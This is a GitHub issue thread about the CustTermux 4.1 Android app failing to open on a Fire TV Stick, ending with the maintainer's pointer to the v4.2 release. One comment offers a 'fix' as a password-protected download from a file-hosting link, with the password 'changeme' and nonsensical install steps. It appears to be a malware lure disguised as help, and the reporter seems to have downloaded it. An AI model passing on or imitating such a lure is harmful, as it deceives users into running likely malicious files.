### ISSUE TITLE
[Bug]: CustTermux [4.1] does not open in Firetv Stick

### ISSUE THREAD

**Issue by Nexus-Gits** [siddharthsky/CustTermux-JioTVGo#34]
### Problem description

CustTermux [4.1] does not open in Firetv Stick. It installed but does not open.

### What steps will reproduce the bug?

Install the CustTermux [4.1] armeabi-v7a apk.

### System information

```shell
Firetv Stick 3rd Gen
```

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Nexus-Gits** [comment]
I download the file but what i do with this file. Please tell me the process. @amir1387aht

**Comment by siddharthsky** [comment]
> ### Problem description
> 
> CustTermux [4.1] does not open in Firetv Stick. It installed but does not open.
> ### What steps will reproduce the bug?
> 
> Install the CustTermux [4.1] armeabi-v7a apk.
> ### What is the expected behavior?
> 
> _No response_
> ### System information
> 
> ```shell
> Firetv Stick 3rd Gen
> ```

Use latest V4.2- the launcher problem is solved.
https://github.com/siddharthsky/CustTermux-JioTVGo/releases/tag/x0.123.6
